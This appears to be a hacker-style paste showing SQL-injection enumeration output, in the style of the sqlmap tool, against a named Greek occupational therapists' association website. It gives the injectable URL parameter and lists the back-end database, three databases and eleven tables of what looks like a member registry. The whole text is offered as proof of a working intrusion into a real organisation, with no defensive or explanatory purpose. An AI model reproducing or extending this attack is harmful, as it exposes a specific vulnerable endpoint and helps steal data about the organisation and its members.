.org organization

.gr Greece

Hellenic Republic - Ministry of Health

Panhellenic Association of Occupational Therapists

https://pse.org.gr/news.php?id=123

the back-end DBMS: MySQL >= 5.0.12

available databases [3]:
[+] information_schema
[+] ergoth_mitroo
[+] test

Database: ergoth_mitroo
[11 tables]
+------------------+
| alerts           |
| apodiksi         |
| apodiksi_det     |
| apodiksipl       |
| apodiksipl_det   |
| categories_news  |
| categories_photo |
| county           |
| county_nomos     |
| files            |
| keimena          |
+------------------
